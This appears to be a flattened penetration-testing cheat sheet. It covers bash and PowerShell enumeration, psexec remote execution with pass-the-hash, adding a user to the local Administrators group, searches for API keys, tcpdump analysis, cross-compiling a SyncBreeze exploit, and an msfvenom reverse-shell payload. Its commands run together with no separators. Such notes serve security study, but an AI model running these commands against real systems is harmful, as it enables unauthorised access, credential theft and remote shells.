-
Bash Environment
echo $PATHenvhistory!1systemctl restart apache2!!
-
Piping
cat error.txt | wc -m > count.txt
-
Text Search
-
grep
ls -la /usr/bin | grep zip
-
sed
echo "I need to try hard" | sed 's/hard/harder/'
-
cut
echo "I hack binaries,web apps,mobile apps, and just about anything else" | cut -f 2 -d ","
-
awk
echo "hello::there::friend" | awk -F "::" '{print $1, $3}'
-
-
Editing Files
- nano
- vi
-
Comparing Files
commdiffvimdiff
-
Managing Process
ping -c 400 localhost > ping_results.txt &jobsfg %1ps -efps -fC leafpadkill
-
Command Monitoring
tail -fwatch –n 5 w
-
Downloading Files
wgetcurlaxel
-
Customizing Bash
HISTCONTROLaliasunaliascat ~/.bashrc
-
cat
cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap"
-
grep
grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpon e\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1
-
for
for ip in $(cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png;donefor url in $(cat list.txt); do host $url; donefor url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -ufor i in {1..10}; do echo 10.11.1.$i; donefor ip in $(seq 1 10); do echo 10.11.1.$ip; done
- Basic Commands
-
Information Gathering
arp -acmdkey /listdism /online /get-features | moreipconfig /allipconfig /displaydnsnet accounts /domainnet group "Domain Admins" /domainnet group "Domain Controllers" /domainnet group /domainnet localgroup "Administrators"net localgroup "Administrators" user /addnet sharenetsh interface ip show interfacesnetstat –naonslookup IP
-
Copy & execute program on remote host
psexec /accepteula \\IP -c C:\Tools\program.exe -u DOMAIN\USER -p PASS
-
Install software on remote host
psexec /accepteula \\IP -i -s "msiexe.exe /i setup.msi" -c setup.msi
-
Enable Powershell on remote host silently
psexec /accepteula \\IP -s c:\Windows\System32\winrm.cmd quickconfig -quiet 2>&1> $null
-
Run command as system on remote host
psexec /accepteula \\IP -s cmd.exe
-
Pass the hash run remote command
psexec /accepteula \\IP -u DOMAIN\USER -p LM:NTLM cmd.exe /c dir c:\file.exe
-
Execute file on remote system
psexec /accepteula \\IP -u DOMAIN\USER -p PASS -c -f \\IP_2\share\file.exe
-
Run file as specified user
runas /user:USER "file.exe"
-
SC create a remote service on host
sc \\IP create SERVICE
-
Query brief status of all services
sc query
-
Query brief status of all services on remote host
sc query \\IP
-
-
Basic Commands
- Information Gathering
Verb-nounGet-Help COMMAND-NAMEGet-Help Get-Command -ExamplesGet-Command Verb-*Get-Command *-nounVerb-Noun | Get-MemberGet-Command | Get-Member -MemeberType MethodGet-ChildItem | Select-Object -Property NameVerb-Noun | Where-Object -Property PropertyName -operator ValueGet-Service | Where-Object -Property Status -eq StoppedGet-ChildItem | Sort-ObjectGet-ChildItem -Path C:\ -Include *interesting-file.txt* -File -Recurse -ErrorAction SilentlyContinue
- Information Gathering
-
Enumeration
- Enumeration
Get-Acl c:/Get-ScheduleTask -TaskName new-sched-taskGet-ProcessGet-ChildItem C:\* -Recurse | Select-String -pattern API_KEYGet-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinueGet-ComputerInfoGet-Hotfix -Id KB4023834Get-Hotfix | measureGet-NetTCPConnection | Where-Object -Property State -Match Listen | measureGet-NetIPAddressGet-LocalGroup | measureGet-LocalUser | Where-Object -Property PasswordRequired -Match falseGet-LocalUser | Get-MemberGet-LocalUser -SID "S-1-5-21-"
- Enumeration
-
Application
- HTTP, SMTP...
- Accepts communication requests from applications
- HTTP, SMTP...
-
Presentation
- WMV, JPEG, MOV...
- Transform data to give format
- WMV, JPEG, MOV...
-
Session
- Session management
- Tracks communication between host/receiver
- Session management
-
Transport
-
TCP
- Segments
-
UDP
- Datagrams
-
-
Network
- IP Address, Routing...
- Logical addressing
- IP Address, Routing...
-
Data Link
- Switching, Mac Address...
- Check received packets
- Data formatted for transmission
- Switching, Mac Address...
-
Physical
- Cables
- Transmit/Receives data
- Cables
-
Follow = TCP Stream / UDP Stream
-
Frame 1
- This is showing details from the physical layer
- The size of the packet received in terms of bytes
-
Ethernet II
- This is showing details from the Data Link layer
- The transmission medium, source and destination MAC addresses of the request.
-
Internet Protocol Version 4
- This is showing details from the Network layer
- The source and destination IP addresses of the request.
-
Transmission Control Protocol
- This is showing details from the Transport layer
- Protocol, etc
-
Hypertext Transfer Protocol / Domain Name System / etc
- This is showing details from the Application layer
- HTTP GET request
tcpdump -r password_cracking_filtered.pcaptcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3 }' | sort | uniq -c | headtcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcaptcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcaptcpdump -n port 81 -r password_cracking_filtered.pcaptcpdump -nX -r password_cracking_filtered.pcap
-
Cross Compiling Exploit Code
apt install mingw-w64i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exei686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT EXITFUNC= thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d"
-
Cross Compile to Windows from Linux
- Compile 32-bit program on 64- bit gcc
sudo apt-get install g++-multilibsudo apt-get install gcc-multilibgcc -m32 -Wl,--hash-style=both exploit.c -o exploit
- Compile 32-bit program on 64- bit gcc